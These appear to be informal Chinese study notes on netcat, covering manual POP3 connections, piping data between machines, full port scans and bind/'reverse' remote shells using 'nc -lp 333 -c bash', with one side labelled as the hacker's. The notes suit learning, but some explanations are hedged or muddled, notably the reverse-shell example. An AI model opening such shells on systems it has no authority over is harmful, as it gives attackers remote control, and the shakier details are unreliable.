Nc(netcut)
Numeric(数字的) verbose(冗长的) spam(垃圾邮件) port(端口) filter (过滤器)
(Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法)
作用1 连接上服务器,进行操作
Eg:1. ping pop3.163.com 得到其ip
2. nc -vn 123.125.50.29 110 v参数是详细的 n参数是数字的(即ip地址,不能是dns),ip是刚刚ping到的pop3服务的ip ,110是该服务监听的端口
3. 然后在另开一个终端,在上面输入base64 再输入邮箱账号,再ctrl+d,得到账号,
4. 在第一个终端上输入 USER 账号 等等操作
这是pop3的,smtp的端口是25,http是80端口
-q参数是只有发送者能加的(应该)
作用2 文本信息的传递
机器1 nc -l -p 1234 & netstat -an | grep 1234
解释 : -l (listen) -p port(端口号) 并且 查看该端口
机器2 nc -vn 机器1ip 机器1端口
解释 : 连接上机器1
成功对话
升级:利用管道符将信息传输
机器2 nc -lp 端口号 > a.txt
机器1 ls -l | nc 机器2ip 机器2端口
作用3Nc 端口扫描
以客户端的形式出现
-z参数 zero i/0 used for scaning
Eg: nc -vnz 192.168.243.140 1-65535
一般情况下,nc探测的是tcp的端口
若 nc -vnzu 192.168.243.140 1-65535
作用4
Nc 远程硬盘克隆
基于硬件的
Nc 远程控制
(正向远程控制)
黑客端 nc -vn 192.168.243.140 333
被控制端 nc -lp 333 -c bash
或者(反向远程控制)
黑客端 nc -vn 192.168.243.140 333 -c bash(就像qq上的远程控制,请求别人来控制你)
被控制端 nc -lp 333
其中看对面是什么shell 用什么shell(应该) windows用cmd